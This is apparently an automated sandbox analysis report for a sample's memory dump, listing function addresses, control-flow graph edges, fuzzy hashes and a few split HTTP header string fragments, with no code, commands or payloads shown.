                                                                                                                                                                          control_flow_graph 0 81093e-81095f call 810cc4 call 8114bc call 813cc0 8 810967-810989 0->8 10 810af1-810af2 8->10 11 81098f-8109d2 call 8109d9 8->11 15 8109d4-8109d5 11->15 16 810a3d-810a76 11->16 17 8109d7-8109e8 call 813653 15->17 18 810a3c 15->18 19 810a7e-810a80 16->19 22 810aec call 810af3 17->22 30 8109ee-810a10 17->30 18->16 21 810a82-810aae 19->21 19->22 21->22 27 810ab0-810abc 21->27 22->10 31 810ac1-810ae5 27->31 30->22 34 810a16-810a3b 30->34 31->10 37 810ae7-810aea 31->37 34->22 38 810a41-810a76 34->38 37->22 37->31 38->19
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000002C.00000002.2992370177.0000000000810000.00000040.00000001.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_44_2_810000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                          • Instruction ID: 193f54a461ee22958edba624c7bec52abd32e53d98dda853fdfa95253aec388a
                                                                                                                                                                          • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                          • Instruction Fuzzy Hash: 175150316443549FEB125F60CC85B9977BCFF04744F040199BA45FE0D6DAB09AD4CE66
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 008114BC Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 39 8114bc-8114df call 8114de 42 8114e1-811500 call 810c9c 39->42 43 811502-811590 call 811345 * 6 39->43 42->43
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000002C.00000002.2992370177.0000000000810000.00000040.00000001.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_44_2_810000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: f5727545300d1671addd51e91b40c8cbd905ff098a5558d7618b97e1a8f51269
                                                                                                                                                                          • Instruction ID: cea91fbe97ee74291821fabfc619cd6afc527543ab57d4e38d0ce671c948162c
                                                                                                                                                                          • Opcode Fuzzy Hash: f5727545300d1671addd51e91b40c8cbd905ff098a5558d7618b97e1a8f51269
                                                                                                                                                                          • Instruction Fuzzy Hash: 1E210E724046149EDF03AF60C9C9CE673ECFF40704F45056AAE85EF44AFA749194CAE6
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00811345 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 59 811345-811352 60 811358-81135e 59->60 61 8113eb-8113ec 59->61 60->61 62 811364-81137a 60->62 62->61 64 81137c-81138f 62->64 66 811391-811398 64->66 67 81139b-8113ab call 810e7c 66->67 70 8113ad-8113e2 67->70 70->61
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000002C.00000002.2992370177.0000000000810000.00000040.00000001.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_44_2_810000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                          • Instruction ID: e5d73c6dfc00810bf1d332ad514b716431d6cc3a42d87a7d08ed0fb7c11739cd
                                                                                                                                                                          • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                          • Instruction Fuzzy Hash: 46218E3190421AAFDF119E78C849B9DBBB9FF04700F054215FA65FB695D770A810CBA4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 008114DE Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 71 8114de-811590 call 813653 call 810c9c call 811345 * 6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000002C.00000002.2992370177.0000000000810000.00000040.00000001.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_44_2_810000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 6d5916cffd13119fdbd97c2973cedf6b12916aa16a29f0e56b04471841f1574a
                                                                                                                                                                          • Instruction ID: 18e119194ac07ce96fb614914b257255aea164d3700f50e5036dd8cf8a1800fd
                                                                                                                                                                          • Opcode Fuzzy Hash: 6d5916cffd13119fdbd97c2973cedf6b12916aa16a29f0e56b04471841f1574a
                                                                                                                                                                          • Instruction Fuzzy Hash: 66117D724045149EEF03AF64C5C98EA73ECFF40704B45096AAD85EF84EFE749194CAE6
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00813F0D Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 90 813f0d-813f29 call 813653 call 81379f 95 813f3b-813f66 call 813f78 * 3 90->95 96 813f2b-813f39 call 81401b 90->96 109 813f71 95->109 103 813f76-813f77 96->103 109->103 110 813f71 call 813f78 109->110 110->103
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000002C.00000002.2992370177.0000000000810000.00000040.00000001.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_44_2_810000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                          • Instruction ID: 6f41db46181ac2ab4a69ef4d4811938c4b8cb3fd74fd25594033d9e7f96721c0
                                                                                                                                                                          • Opcode Fuzzy Hash: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                          • Instruction Fuzzy Hash: CDF01C70988644ABEF403BB48C4B6993ABCFF50745F040591BA8AED0D6DE7086D19E76
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                          Function 00814675 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 136 814675-81468d call 813a1c 139 81469d-8146cd 136->139 140 81468f-814698 call 813a6e 136->140 143 8146d3-8146f5 139->143 144 8147e7-8147ec 139->144 140->139 143->144 146 8146fb-814720 143->146 148 814722-814737 146->148 149 814738-81475a 146->149 148->149 151 81475c-81477e 149->151 152 8147bf-8147c9 149->152 151->152 157 814780-8147a2 151->157 153 8147e0-8147e5 152->153 154 8147cb-8147dd call 813673 152->154 153->144 154->153 157->152 160 8147a4-8147bc 157->160 160->152
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000002C.00000002.2992370177.0000000000810000.00000040.00000001.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_44_2_810000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                          • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                          • Instruction ID: 6ac904193c9c1ce5ba3d7d9b1469b0333c410c058c25657fd97bb2c8e4e9f5fe
                                                                                                                                                                          • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                          • Instruction Fuzzy Hash: 014161B6500208BFEF125F65CC48BEEBBBDFF80704F154469EA44EA294D7309A84CB94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00814674 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 111 814674-814680 112 81468b-81468d 111->112 113 814686 call 813a1c 111->113 114 81469d-8146cd 112->114 115 81468f-814698 call 813a6e 112->115 113->112 118 8146d3-8146f5 114->118 119 8147e7-8147ec 114->119 115->114 118->119 121 8146fb-814720 118->121 123 814722-814737 121->123 124 814738-81475a 121->124 123->124 126 81475c-81477e 124->126 127 8147bf-8147c9 124->127 126->127 132 814780-8147a2 126->132 128 8147e0-8147e5 127->128 129 8147cb-8147dd call 813673 127->129 128->119 129->128 132->127 135 8147a4-8147bc 132->135 135->127
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000002C.00000002.2992370177.0000000000810000.00000040.00000001.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_44_2_810000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                          • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                          • Instruction ID: f4b885dfc6e92519a4d14edd097611dea836544ecbc21365cff420756cbb7cf9
                                                                                                                                                                          • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                          • Instruction Fuzzy Hash: 1C4153B6500208BFEF129F65CC44BEEBBB9FF84704F154459EA44EA254D7349A84CB94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%